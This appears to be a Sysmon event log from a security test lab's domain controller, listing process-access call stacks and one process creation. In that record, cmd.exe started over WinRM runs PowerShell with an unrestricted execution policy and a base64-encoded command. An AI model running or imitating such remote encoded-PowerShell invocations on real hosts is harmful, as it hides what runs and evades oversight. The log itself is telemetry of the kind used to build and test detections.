13:33:17.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E1D-6005-C402-00000000A201}3288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.466{59A5CD1D-8E1D-6005-C202-00000000A201}12242484C:\Windows\system32\WinrsHost.exe{59A5CD1D-8E1D-6005-C402-00000000A201}3288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x8000000000000000193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.466{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.475{59A5CD1D-8E1D-6005-C402-00000000A201}3288C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcA
QgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1D-6005-C64B-100000000000}0x104bc60HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E1D-6005-C202-00000000A201}1224C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.466{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.403{59A5CD1D-8CA9-6005-1300-00000000A201}12681244C:\Windows\system32\svchost.exe{59A5CD1D-8E1D-6005-C202-00000000A201}1224C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.387{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E1D-6005-C202-00000000A201}1224C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8E1D-6005-C302-00000000A201}48324960C:\Windows\system32\conhost.exe{59A5CD1D-8E1D-6005-C202-00000000A201}1224C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E1D-6005-C302-00000000A201}4832C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 